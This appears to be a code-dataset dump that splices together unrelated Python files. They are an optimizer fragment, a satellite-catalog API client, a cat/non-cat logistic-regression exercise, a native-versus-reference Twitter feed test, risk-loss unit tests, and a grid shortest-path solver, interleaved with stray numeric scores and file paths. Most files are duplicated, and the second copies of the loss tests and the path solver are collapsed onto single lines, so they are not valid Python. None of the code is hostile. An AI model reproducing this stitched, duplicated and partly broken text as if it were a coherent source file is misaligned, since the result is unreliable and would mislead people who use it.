        self._evaluate_new2current(score_new)
        self._evaluate_current2best()

        # Periodically snap the current particle back to its best-known state.
        if self.nth_iter % self._opt_args_.n_neighbours == 0:
            self.p_current.score_current = self.p_current.score_best
            self.p_current.pos_current = self.p_current.pos_best

        self.Y_sample.append(score_new)
        self.nth_iter += 1
0.678433
0.36869
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2016, EOSS GmbH"
__credits__ = ["<NAME>", "<NAME>"]
__license__ = "GPL"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"

import ujson
import requests

from manage import ICatalog
from model.plain_models import Catalog_Dataset
from shapely.geometry import Polygon
from shapely.wkt import dumps as wkt_dumps


class EOSSCatalog(ICatalog):
    """
    EOSS Catalog interface
    """

    def __init__(self):
        # Search endpoint and default request headers.
        self.url = 'http://api.eoss.cloud/catalog/search/result.json'
        self.headers = {'content-type': 'application/json'}

    def find(self, platform, aoi, date_start, date_stop, cloud_ratio=1.0):
        """Query the EOSS catalog and return the matches as a set of Catalog_Dataset.

        platform    -- sensor/platform name sent to the API
        aoi         -- sequence of coordinate pairs describing the area of interest
        date_start, date_stop -- datetimes bounding the acquisition window
        cloud_ratio -- maximum cloud cover as a fraction in [0, 1]
        """
        session = requests.Session()
        session.auth = (None, None)
        session.stream = True
        headers = {'content-type': 'application/json'}

        # The API expects the AOI as a WKT polygon string.
        poly = Polygon(aoi)
        geometry = wkt_dumps(poly)

        params = dict()
        params['clouds'] = int(100 * cloud_ratio)  # API takes percent
        dates = dict()
        dates['start_date'] = date_start.strftime('%m/%d/%Y')
        dates['end_date'] = date_stop.strftime('%m/%d/%Y')
        params['daterange'] = [dates]
        params['sensors'] = [{'name': platform}]
        params['areas'] = [{'aoi': geometry}]

        response = requests.post(self.url, json=ujson.loads(ujson.dumps(params)),
                                 auth=session.auth, headers=headers)

        datasets = set()
        if response.status_code == requests.codes.ok:
            result = response.json()['found_dataset']
            for r in result:
                ds = Catalog_Dataset()
                ds.entity_id = r['entity_id']
                ds.acq_time = r['acq_time']
                ds.sensor = r['sensor']
                ds.tile_identifier = r['tile_identifier']
                ds.clouds = r['clouds']
                ds.level = r['level']
                ds.daynight = r['daynight']
                datasets.add(ds)
        else:
            # Fixed: use the print() function instead of the Python-2-only
            # print statement, so the module also parses under Python 3.
            print(response.text)
        return datasets

    def register(self, ds):
        raise Exception('Registering datasets in EOSSCatalog not implemented!!!')
catalog/manage/eosscatalog.py
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2016, EOSS GmbH"
__credits__ = ["<NAME>", "<NAME>"]
__license__ = "GPL"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"

import ujson
import requests

from manage import ICatalog
from model.plain_models import Catalog_Dataset
from shapely.geometry import Polygon
from shapely.wkt import dumps as wkt_dumps


class EOSSCatalog(ICatalog):
    """
    EOSS Catalog interface
    """

    def __init__(self):
        # Search endpoint and default request headers.
        self.url = 'http://api.eoss.cloud/catalog/search/result.json'
        self.headers = {'content-type': 'application/json'}

    def find(self, platform, aoi, date_start, date_stop, cloud_ratio=1.0):
        """Query the EOSS catalog and return the matches as a set of Catalog_Dataset.

        platform    -- sensor/platform name sent to the API
        aoi         -- sequence of coordinate pairs describing the area of interest
        date_start, date_stop -- datetimes bounding the acquisition window
        cloud_ratio -- maximum cloud cover as a fraction in [0, 1]
        """
        session = requests.Session()
        session.auth = (None, None)
        session.stream = True
        headers = {'content-type': 'application/json'}

        # The API expects the AOI as a WKT polygon string.
        poly = Polygon(aoi)
        geometry = wkt_dumps(poly)

        params = dict()
        params['clouds'] = int(100 * cloud_ratio)  # API takes percent
        dates = dict()
        dates['start_date'] = date_start.strftime('%m/%d/%Y')
        dates['end_date'] = date_stop.strftime('%m/%d/%Y')
        params['daterange'] = [dates]
        params['sensors'] = [{'name': platform}]
        params['areas'] = [{'aoi': geometry}]

        response = requests.post(self.url, json=ujson.loads(ujson.dumps(params)),
                                 auth=session.auth, headers=headers)

        datasets = set()
        if response.status_code == requests.codes.ok:
            result = response.json()['found_dataset']
            for r in result:
                ds = Catalog_Dataset()
                ds.entity_id = r['entity_id']
                ds.acq_time = r['acq_time']
                ds.sensor = r['sensor']
                ds.tile_identifier = r['tile_identifier']
                ds.clouds = r['clouds']
                ds.level = r['level']
                ds.daynight = r['daynight']
                datasets.add(ds)
        else:
            # Fixed: use the print() function instead of the Python-2-only
            # print statement, so the module also parses under Python 3.
            print(response.text)
        return datasets

    def register(self, ds):
        raise Exception('Registering datasets in EOSSCatalog not implemented!!!')
0.512693
0.072047
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
import h5py
import scipy
from PIL import Image
from scipy import ndimage


def load_dataset():
    """Load the cat/non-cat HDF5 datasets and return train/test arrays plus classes."""
    train_dataset = h5py.File('train_catvnoncat.h5', "r")
    train_set_x_orig = np.array(train_dataset["train_set_x"][:])  # your train set features
    train_set_y_orig = np.array(train_dataset["train_set_y"][:])  # your train set labels

    test_dataset = h5py.File('test_catvnoncat.h5', "r")
    test_set_x_orig = np.array(test_dataset["test_set_x"][:])  # your test set features
    test_set_y_orig = np.array(test_dataset["test_set_y"][:])  # your test set labels

    classes = np.array(test_dataset["list_classes"][:])  # the list of classes

    # Labels become row vectors of shape (1, m).
    train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
    test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))

    return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes


train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()

m_train = train_set_x_orig.shape[0]
m_test = test_set_x_orig.shape[0]
num_px = train_set_x_orig[0].shape[0]

# Flatten each (num_px, num_px, 3) image into one column of the design matrix.
train_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T
test_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T

print ("train_set_x_flatten shape: " + str(train_set_x_flatten.shape))
print ("train_set_y shape: " + str(train_set_y.shape))
print ("test_set_x_flatten shape: " + str(test_set_x_flatten.shape))
print ("test_set_y shape: " + str(test_set_y.shape))
print ("sanity check after reshaping: " + str(train_set_x_flatten[0:5, 0]))

# Scale pixel values into [0, 1].
train_set_x = train_set_x_flatten / 255.
test_set_x = test_set_x_flatten / 255.
def sigmoid(z):
    """Logistic function 1 / (1 + e^-z), elementwise on arrays."""
    return 1 / (1 + np.exp(-z))


def initialize_with_zeros(dim):
    """Return a zero weight column vector of shape (dim, 1) and scalar bias 0."""
    w = np.zeros((dim, 1))
    b = 0
    assert (w.shape == (dim, 1))
    assert (isinstance(b, float) or isinstance(b, int))
    return w, b


def propagate(w, b, X, Y):
    """One forward/backward pass; return gradients {dw, db} and the scalar cost."""
    m = X.shape[1]

    A = sigmoid(np.dot(w.T, X) + b)  # compute activation
    cost = (- 1 / m) * np.sum(Y * np.log(A) + (1 - Y) * (np.log(1 - A)))  # compute cost

    dw = (1 / m) * np.dot(X, (A - Y).T)
    db = (1 / m) * np.sum(A - Y)

    assert (dw.shape == w.shape)
    assert (db.dtype == float)
    cost = np.squeeze(cost)
    assert (cost.shape == ())

    return {"dw": dw, "db": db}, cost


def optimize(w, b, X, Y, num_iterations, learning_rate, print_cost=False):
    """Plain gradient descent on (w, b); costs are recorded every 100 iterations."""
    costs = []
    for i in range(num_iterations):
        grads, cost = propagate(w, b, X, Y)
        dw = grads["dw"]
        db = grads["db"]

        w = w - learning_rate * dw
        b = b - learning_rate * db

        if i % 100 == 0:
            costs.append(cost)
            if print_cost:
                print("Cost after iteration %i: %f" % (i, cost))

    params = {"w": w, "b": b}
    grads = {"dw": dw, "db": db}
    return params, grads, costs


def predict(w, b, X):
    """Threshold sigmoid(w.T X + b) at 0.5 and return 0/1 predictions of shape (1, m)."""
    m = X.shape[1]
    Y_prediction = np.zeros((1, m))
    w = w.reshape(X.shape[0], 1)

    A = sigmoid(np.dot(w.T, X) + b)
    for i in range(A.shape[1]):
        # Convert probabilities A[0,i] to actual predictions p[0,i]
        Y_prediction[0][i] = 1 if A[0][i] > 0.5 else 0

    assert (Y_prediction.shape == (1, m))
    return Y_prediction


def model(X_train, Y_train, X_test, Y_test, num_iterations=2000, learning_rate=0.5, print_cost=False):
    """
    Builds the logistic regression model by calling the function you've implemented previously

    Arguments:
    X_train -- training set represented by a numpy array of shape (num_px * num_px * 3, m_train)
    Y_train -- training labels represented by a numpy array (vector) of shape (1, m_train)
    X_test -- test set represented by a numpy array of shape (num_px * num_px * 3, m_test)
    Y_test -- test labels represented by a numpy array (vector) of shape (1, m_test)
    num_iterations -- hyperparameter representing the number of iterations to optimize the parameters
    learning_rate -- hyperparameter representing the learning rate used in the update rule of optimize()
    print_cost -- Set to true to print the cost every 100 iterations

    Returns:
    d -- dictionary containing information about the model.
    """
    # initialize parameters with zeros
    w, b = initialize_with_zeros(X_train.shape[0])

    # Gradient descent
    parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)

    # Retrieve parameters w and b from dictionary "parameters"
    w = parameters["w"]
    b = parameters["b"]

    # Predict test/train set examples
    Y_prediction_test = predict(w, b, X_test)
    Y_prediction_train = predict(w, b, X_train)

    # Print train/test Errors
    print("train accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))
    print("test accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))

    return {"costs": costs,
            "Y_prediction_test": Y_prediction_test,
            "Y_prediction_train": Y_prediction_train,
            "w": w,
            "b": b,
            "learning_rate": learning_rate,
            "num_iterations": num_iterations}


d = model(train_set_x, train_set_y, test_set_x, test_set_y,
          num_iterations=2000, learning_rate=0.005, print_cost=True)

# Plot learning curve (with costs)
costs = np.squeeze(d['costs'])
plt.plot(costs)
plt.ylabel('cost')
plt.xlabel('iterations (per hundreds)')
plt.title("Learning rate =" + str(d["learning_rate"]))
plt.show()

# (PUT YOUR IMAGE NAME)
my_image = "my_image.jpg"  # change this to the name of your image file
fname = my_image
image = np.array(matplotlib.pyplot.imread(fname))
my_image = np.array(Image.fromarray(image).resize((num_px, num_px))).reshape((1, num_px * num_px * 3)).T
my_image = my_image / 255
my_predicted_image = predict(d["w"], d["b"], my_image)
plt.imshow(image)
print("y = " + str(np.squeeze(my_predicted_image)) + ", Algorithm predicts a \"" +
      classes[int(np.squeeze(my_predicted_image)),].decode("utf-8") + "\" picture.")
LR.py
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
import h5py
import scipy
from PIL import Image
from scipy import ndimage


def load_dataset():
    """Load the cat/non-cat HDF5 datasets and return train/test arrays plus classes."""
    train_dataset = h5py.File('train_catvnoncat.h5', "r")
    train_set_x_orig = np.array(train_dataset["train_set_x"][:])  # your train set features
    train_set_y_orig = np.array(train_dataset["train_set_y"][:])  # your train set labels

    test_dataset = h5py.File('test_catvnoncat.h5', "r")
    test_set_x_orig = np.array(test_dataset["test_set_x"][:])  # your test set features
    test_set_y_orig = np.array(test_dataset["test_set_y"][:])  # your test set labels

    classes = np.array(test_dataset["list_classes"][:])  # the list of classes

    # Labels become row vectors of shape (1, m).
    train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
    test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))

    return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes


train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()

m_train = train_set_x_orig.shape[0]
m_test = test_set_x_orig.shape[0]
num_px = train_set_x_orig[0].shape[0]

# Flatten each (num_px, num_px, 3) image into one column of the design matrix.
train_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T
test_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T

print ("train_set_x_flatten shape: " + str(train_set_x_flatten.shape))
print ("train_set_y shape: " + str(train_set_y.shape))
print ("test_set_x_flatten shape: " + str(test_set_x_flatten.shape))
print ("test_set_y shape: " + str(test_set_y.shape))
print ("sanity check after reshaping: " + str(train_set_x_flatten[0:5, 0]))

# Scale pixel values into [0, 1].
train_set_x = train_set_x_flatten / 255.
test_set_x = test_set_x_flatten / 255.
def sigmoid(z):
    """Logistic function 1 / (1 + e^-z), elementwise on arrays."""
    return 1 / (1 + np.exp(-z))


def initialize_with_zeros(dim):
    """Return a zero weight column vector of shape (dim, 1) and scalar bias 0."""
    w = np.zeros((dim, 1))
    b = 0
    assert (w.shape == (dim, 1))
    assert (isinstance(b, float) or isinstance(b, int))
    return w, b


def propagate(w, b, X, Y):
    """One forward/backward pass; return gradients {dw, db} and the scalar cost."""
    m = X.shape[1]

    A = sigmoid(np.dot(w.T, X) + b)  # compute activation
    cost = (- 1 / m) * np.sum(Y * np.log(A) + (1 - Y) * (np.log(1 - A)))  # compute cost

    dw = (1 / m) * np.dot(X, (A - Y).T)
    db = (1 / m) * np.sum(A - Y)

    assert (dw.shape == w.shape)
    assert (db.dtype == float)
    cost = np.squeeze(cost)
    assert (cost.shape == ())

    return {"dw": dw, "db": db}, cost


def optimize(w, b, X, Y, num_iterations, learning_rate, print_cost=False):
    """Plain gradient descent on (w, b); costs are recorded every 100 iterations."""
    costs = []
    for i in range(num_iterations):
        grads, cost = propagate(w, b, X, Y)
        dw = grads["dw"]
        db = grads["db"]

        w = w - learning_rate * dw
        b = b - learning_rate * db

        if i % 100 == 0:
            costs.append(cost)
            if print_cost:
                print("Cost after iteration %i: %f" % (i, cost))

    params = {"w": w, "b": b}
    grads = {"dw": dw, "db": db}
    return params, grads, costs


def predict(w, b, X):
    """Threshold sigmoid(w.T X + b) at 0.5 and return 0/1 predictions of shape (1, m)."""
    m = X.shape[1]
    Y_prediction = np.zeros((1, m))
    w = w.reshape(X.shape[0], 1)

    A = sigmoid(np.dot(w.T, X) + b)
    for i in range(A.shape[1]):
        # Convert probabilities A[0,i] to actual predictions p[0,i]
        Y_prediction[0][i] = 1 if A[0][i] > 0.5 else 0

    assert (Y_prediction.shape == (1, m))
    return Y_prediction


def model(X_train, Y_train, X_test, Y_test, num_iterations=2000, learning_rate=0.5, print_cost=False):
    """
    Builds the logistic regression model by calling the function you've implemented previously

    Arguments:
    X_train -- training set represented by a numpy array of shape (num_px * num_px * 3, m_train)
    Y_train -- training labels represented by a numpy array (vector) of shape (1, m_train)
    X_test -- test set represented by a numpy array of shape (num_px * num_px * 3, m_test)
    Y_test -- test labels represented by a numpy array (vector) of shape (1, m_test)
    num_iterations -- hyperparameter representing the number of iterations to optimize the parameters
    learning_rate -- hyperparameter representing the learning rate used in the update rule of optimize()
    print_cost -- Set to true to print the cost every 100 iterations

    Returns:
    d -- dictionary containing information about the model.
    """
    # initialize parameters with zeros
    w, b = initialize_with_zeros(X_train.shape[0])

    # Gradient descent
    parameters, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)

    # Retrieve parameters w and b from dictionary "parameters"
    w = parameters["w"]
    b = parameters["b"]

    # Predict test/train set examples
    Y_prediction_test = predict(w, b, X_test)
    Y_prediction_train = predict(w, b, X_train)

    # Print train/test Errors
    print("train accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))
    print("test accuracy: {} %".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))

    return {"costs": costs,
            "Y_prediction_test": Y_prediction_test,
            "Y_prediction_train": Y_prediction_train,
            "w": w,
            "b": b,
            "learning_rate": learning_rate,
            "num_iterations": num_iterations}


d = model(train_set_x, train_set_y, test_set_x, test_set_y,
          num_iterations=2000, learning_rate=0.005, print_cost=True)

# Plot learning curve (with costs)
costs = np.squeeze(d['costs'])
plt.plot(costs)
plt.ylabel('cost')
plt.xlabel('iterations (per hundreds)')
plt.title("Learning rate =" + str(d["learning_rate"]))
plt.show()

# (PUT YOUR IMAGE NAME)
my_image = "my_image.jpg"  # change this to the name of your image file
fname = my_image
image = np.array(matplotlib.pyplot.imread(fname))
my_image = np.array(Image.fromarray(image).resize((num_px, num_px))).reshape((1, num_px * num_px * 3)).T
my_image = my_image / 255
my_predicted_image = predict(d["w"], d["b"], my_image)
plt.imshow(image)
print("y = " + str(np.squeeze(my_predicted_image)) + ", Algorithm predicts a \"" +
      classes[int(np.squeeze(my_predicted_image)),].decode("utf-8") + "\" picture.")
0.505859
0.580768
BUILD_PATH = "../build/"
LIBNAME = "libTwitter.so"

import sys
sys.path.append(BUILD_PATH)

import ctypes
import os

# Load the native library lazily so unresolved symbols fail on first use.
ctypes.CDLL(BUILD_PATH + LIBNAME, mode=os.RTLD_LAZY)

from twitwi import Twitter

import json
import time
from random import randint


class TwitterRef:
    """Pure-Python reference implementation the native Twitter is checked against."""

    def __init__(self):
        self.tweetMap = {}  # userId -> list of (tweetId, timestamp), newest first
        self.users = {}     # userId -> set of followee ids (or None)

    def postTweet(self, userId, tweetId):
        entry = (tweetId, time.time())
        if userId in self.tweetMap:
            self.tweetMap[userId].insert(0, entry)
        else:
            self.tweetMap[userId] = [entry]

    def getNewsFeed(self, userId):
        # Own 10 most recent tweets, plus the 10 most recent of each followee.
        tweets = self.tweetMap[userId][0:10] if userId in self.tweetMap else []
        followees = self.users.get(userId)
        if followees is None:
            return [t[0] for t in tweets]
        for followee in followees:
            if followee in self.tweetMap:
                tweets += self.tweetMap[followee][0:10]
        newest = sorted(tweets, key=lambda t: t[1], reverse=True)[0:10]
        return [t[0] for t in newest]

    def follow(self, followerId, followeeId):
        if followerId == followeeId:
            return
        if self.users.get(followerId) is None:
            self.users[followerId] = set()
        self.users[followerId].add(followeeId)

    def unfollow(self, followerId, followeeId):
        if followerId == followeeId:
            return
        followees = self.users.get(followerId)
        if followees is not None and followeeId in followees:
            followees.remove(followeeId)


class Wrapper:
    """Drives the native Twitter and the Python reference side by side."""

    def __init__(self):
        self.twitterRef = TwitterRef()
        self.twitter = Twitter()

    def exec(self, input):
        # input[0]: 0 = follow, 1 = unfollow, 2 = postTweet, 3 = getNewsFeed
        action = input[0]
        if action == 3:
            return (self.twitter.getNewsFeed(input[1]),
                    self.twitterRef.getNewsFeed(input[1]))
        if action == 0:
            self.twitter.follow(input[1], input[2])
            self.twitterRef.follow(input[1], input[2])
        elif action == 1:
            self.twitter.unfollow(input[1], input[2])
            self.twitterRef.unfollow(input[1], input[2])
        elif action == 2:
            self.twitterRef.postTweet(input[1], input[2])
            self.twitter.postTweet(input[1], input[2])


def generate_array(nbAction):
    """Build a random action list: feed reads carry one id, mutations carry two."""
    actions = []
    for _ in range(randint(0, nbAction)):
        kind = randint(0, 3)
        if kind == 3:
            actions.append((kind, randint(0, 100)))
        else:
            actions.append((kind, randint(0, 100), randint(0, 100)))
    return actions


def test(actions=None):
    """Replay `actions` (or a fresh random batch, saved to ./actions) and compare feeds."""
    wrapper = Wrapper()
    if actions is None:
        actions = generate_array(100000)
        with open("actions", "w") as f:
            json.dump(actions, f)
    for action in actions:
        if action[0] == 3:
            native, reference = wrapper.exec(action)
            observed = [elm for elm in native]
            if reference != observed:
                import pdb; pdb.set_trace()
            assert reference == observed, (reference, observed)
        else:
            wrapper.exec(action)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "r") as f:
            actions = json.load(f)
        test(actions)
    else:
        test()
    print("All generated tests passed")
test/run.py
BUILD_PATH = "../build/"
LIBNAME = "libTwitter.so"

import sys
sys.path.append(BUILD_PATH)

import ctypes
import os

# Load the native library lazily so unresolved symbols fail on first use.
ctypes.CDLL(BUILD_PATH + LIBNAME, mode=os.RTLD_LAZY)

from twitwi import Twitter

import json
import time
from random import randint


class TwitterRef:
    """Pure-Python reference implementation the native Twitter is checked against."""

    def __init__(self):
        self.tweetMap = {}  # userId -> list of (tweetId, timestamp), newest first
        self.users = {}     # userId -> set of followee ids (or None)

    def postTweet(self, userId, tweetId):
        entry = (tweetId, time.time())
        if userId in self.tweetMap:
            self.tweetMap[userId].insert(0, entry)
        else:
            self.tweetMap[userId] = [entry]

    def getNewsFeed(self, userId):
        # Own 10 most recent tweets, plus the 10 most recent of each followee.
        tweets = self.tweetMap[userId][0:10] if userId in self.tweetMap else []
        followees = self.users.get(userId)
        if followees is None:
            return [t[0] for t in tweets]
        for followee in followees:
            if followee in self.tweetMap:
                tweets += self.tweetMap[followee][0:10]
        newest = sorted(tweets, key=lambda t: t[1], reverse=True)[0:10]
        return [t[0] for t in newest]

    def follow(self, followerId, followeeId):
        if followerId == followeeId:
            return
        if self.users.get(followerId) is None:
            self.users[followerId] = set()
        self.users[followerId].add(followeeId)

    def unfollow(self, followerId, followeeId):
        if followerId == followeeId:
            return
        followees = self.users.get(followerId)
        if followees is not None and followeeId in followees:
            followees.remove(followeeId)


class Wrapper:
    """Drives the native Twitter and the Python reference side by side."""

    def __init__(self):
        self.twitterRef = TwitterRef()
        self.twitter = Twitter()

    def exec(self, input):
        # input[0]: 0 = follow, 1 = unfollow, 2 = postTweet, 3 = getNewsFeed
        action = input[0]
        if action == 3:
            return (self.twitter.getNewsFeed(input[1]),
                    self.twitterRef.getNewsFeed(input[1]))
        if action == 0:
            self.twitter.follow(input[1], input[2])
            self.twitterRef.follow(input[1], input[2])
        elif action == 1:
            self.twitter.unfollow(input[1], input[2])
            self.twitterRef.unfollow(input[1], input[2])
        elif action == 2:
            self.twitterRef.postTweet(input[1], input[2])
            self.twitter.postTweet(input[1], input[2])


def generate_array(nbAction):
    """Build a random action list: feed reads carry one id, mutations carry two."""
    actions = []
    for _ in range(randint(0, nbAction)):
        kind = randint(0, 3)
        if kind == 3:
            actions.append((kind, randint(0, 100)))
        else:
            actions.append((kind, randint(0, 100), randint(0, 100)))
    return actions


def test(actions=None):
    """Replay `actions` (or a fresh random batch, saved to ./actions) and compare feeds."""
    wrapper = Wrapper()
    if actions is None:
        actions = generate_array(100000)
        with open("actions", "w") as f:
            json.dump(actions, f)
    for action in actions:
        if action[0] == 3:
            native, reference = wrapper.exec(action)
            observed = [elm for elm in native]
            if reference != observed:
                import pdb; pdb.set_trace()
            assert reference == observed, (reference, observed)
        else:
            wrapper.exec(action)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "r") as f:
            actions = json.load(f)
        test(actions)
    else:
        test()
    print("All generated tests passed")
0.121048
0.075858
import unittest

from riskquant import loss


class FixedValueModel(object):
    """Stub distribution whose draw() always yields the same value."""

    def __init__(self, value):
        self.value = value

    def draw(self, n=1):
        return [self.value] * n


class TestLoss(unittest.TestCase):
    def test_simulate_losses_one_year(self):
        model = loss.Loss(FixedValueModel(1), FixedValueModel(0.5))
        self.assertEqual([0.5], model.simulate_losses_one_year())

    def test_simulate_losses_one_year_multiple_loss(self):
        # Three events per year, each costing 0.5.
        model = loss.Loss(FixedValueModel(3), FixedValueModel(0.5))
        self.assertEqual([0.5, 0.5, 0.5], model.simulate_losses_one_year())

    def test_simulate_years(self):
        model = loss.Loss(FixedValueModel(1), FixedValueModel(0.5))
        self.assertEqual([0.5, 0.5, 0.5], model.simulate_years(3))

    def test_simulate_years_frequency(self):
        # Two 0.5 events per year aggregate to 1.0 per simulated year.
        model = loss.Loss(FixedValueModel(2), FixedValueModel(0.5))
        self.assertEqual([1.0, 1.0, 1.0], model.simulate_years(3))

    def test_simulate_zeros(self):
        # Zero frequency means zero total loss every year.
        model = loss.Loss(FixedValueModel(0), FixedValueModel(0.5))
        self.assertEqual([0, 0, 0], model.simulate_years(3))

    def testSummary(self):
        losses = []
        for magnitude in range(10):
            model = loss.Loss(FixedValueModel(1), FixedValueModel(magnitude))
            losses += model.simulate_years(100)
        losses += model.simulate_years(10)  # Add a few more for value 9
        summary = model.summarize_loss(losses)
        self.assertEqual(summary['minimum'], 0)
        self.assertEqual(summary['tenth_percentile'], 1)
        self.assertEqual(summary['mode'], 9)
        self.assertEqual(summary['median'], 5)
        self.assertEqual(summary['ninetieth_percentile'], 9)
        self.assertEqual(summary['maximum'], 9)


if __name__ == '__main__':
    unittest.main()
tests/test_loss.py
import unittest from riskquant import loss class FixedValueModel(object): def __init__(self, value): self.value = value def draw(self, n=1): return [self.value] * n class TestLoss(unittest.TestCase): def test_simulate_losses_one_year(self): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(0.5)) single_loss = loss_model.simulate_losses_one_year() self.assertEqual([0.5], single_loss) def test_simulate_losses_one_year_multiple_loss(self): loss_model = loss.Loss(FixedValueModel(3), FixedValueModel(0.5)) single_loss = loss_model.simulate_losses_one_year() self.assertEqual([0.5, 0.5, 0.5], single_loss) def test_simulate_years(self): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([0.5, 0.5, 0.5], multiple_years) def test_simulate_years_frequency(self): loss_model = loss.Loss(FixedValueModel(2), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([1.0, 1.0, 1.0], multiple_years) def test_simulate_zeros(self): loss_model = loss.Loss(FixedValueModel(0), FixedValueModel(0.5)) multiple_years = loss_model.simulate_years(3) self.assertEqual([0, 0, 0], multiple_years) def testSummary(self): loss_array = [] for i in range(10): loss_model = loss.Loss(FixedValueModel(1), FixedValueModel(i)) loss_array += loss_model.simulate_years(100) loss_array += loss_model.simulate_years(10) # Add a few more for value 9 summary = loss_model.summarize_loss(loss_array) self.assertEqual(summary['minimum'], 0) self.assertEqual(summary['tenth_percentile'], 1) self.assertEqual(summary['mode'], 9) self.assertEqual(summary['median'], 5) self.assertEqual(summary['ninetieth_percentile'], 9) self.assertEqual(summary['maximum'], 9) if __name__ == '__main__': unittest.main()
0.810779
0.625638
class ShortestWay: @classmethod def find_shortest_way_1(cls, arr): if arr is None or len(arr) == 0: return 0 my_arr = list() row_count = len(arr) col_count = len(arr[0]) for row in arr: my_arr.append([0 for _ in row]) for i in range(col_count): if i == 0: my_arr[0][i] = arr[0][i] else: my_arr[0][i] = arr[0][i] + my_arr[0][i-1] for i in range(row_count): if i == 0: continue else: my_arr[i][0] = arr[i][0] + my_arr[i-1][0] for row in range(1, row_count): for col in range(1, col_count): my_arr[row][col] = min((my_arr[row-1][col], my_arr[row][col-1])) + arr[row][col] return my_arr[row_count-1][col_count-1] @classmethod def find_shortest_way_2(cls, arr): if arr is None or len(arr) == 0: return 0 my_arr = list() row_count = len(arr) col_count = len(arr[0]) length = min([row_count, col_count]) for _ in range(length): my_arr.append(0) if row_count > col_count: for i in range(row_count): for j in range(col_count): if i == 0 and j == 0: my_arr[j] = arr[0][0] else: if i == 0: my_arr[j] = my_arr[j-1] + arr[0][j] else: if j != 0: my_arr[j] = min([my_arr[j-1], my_arr[j]]) + arr[i][j] else: my_arr[j] = arr[i][j] + my_arr[j] if row_count <= col_count: for i in range(col_count): for j in range(row_count): if i == 0 and j == 0: my_arr[j] = arr[0][0] else: if i == 0: my_arr[j] = my_arr[j-1] + arr[j][0] else: if j != 0: my_arr[j] = min([my_arr[j-1], my_arr[j]]) + arr[j][i] else: my_arr[j] = arr[j][i] + my_arr[j] return my_arr[-1] if __name__ == '__main__': m = [ [1, 3, 5, 9], [8, 1, 3, 4], [5, 0, 6, 1], [8, 8, 4, 0] ] print(ShortestWay.find_shortest_way_1(m)) print(ShortestWay.find_shortest_way_2(m))
dp/q2.py
class ShortestWay: @classmethod def find_shortest_way_1(cls, arr): if arr is None or len(arr) == 0: return 0 my_arr = list() row_count = len(arr) col_count = len(arr[0]) for row in arr: my_arr.append([0 for _ in row]) for i in range(col_count): if i == 0: my_arr[0][i] = arr[0][i] else: my_arr[0][i] = arr[0][i] + my_arr[0][i-1] for i in range(row_count): if i == 0: continue else: my_arr[i][0] = arr[i][0] + my_arr[i-1][0] for row in range(1, row_count): for col in range(1, col_count): my_arr[row][col] = min((my_arr[row-1][col], my_arr[row][col-1])) + arr[row][col] return my_arr[row_count-1][col_count-1] @classmethod def find_shortest_way_2(cls, arr): if arr is None or len(arr) == 0: return 0 my_arr = list() row_count = len(arr) col_count = len(arr[0]) length = min([row_count, col_count]) for _ in range(length): my_arr.append(0) if row_count > col_count: for i in range(row_count): for j in range(col_count): if i == 0 and j == 0: my_arr[j] = arr[0][0] else: if i == 0: my_arr[j] = my_arr[j-1] + arr[0][j] else: if j != 0: my_arr[j] = min([my_arr[j-1], my_arr[j]]) + arr[i][j] else: my_arr[j] = arr[i][j] + my_arr[j] if row_count <= col_count: for i in range(col_count): for j in range(row_count): if i == 0 and j == 0: my_arr[j] = arr[0][0] else: if i == 0: my_arr[j] = my_arr[j-1] + arr[j][0] else: if j != 0: my_arr[j] = min([my_arr[j-1], my_arr[j]]) + arr[j][i] else: my_arr[j] = arr[j][i] + my_arr[j] return my_arr[-1] if __name__ == '__main__': m = [ [1, 3, 5, 9], [8, 1, 3, 4], [5, 0, 6, 1], [8, 8, 4, 0] ] print(ShortestWay.find_shortest_way_1(m)) print(ShortestWay.find_shortest_way_2(m))
0.276105
0.310498
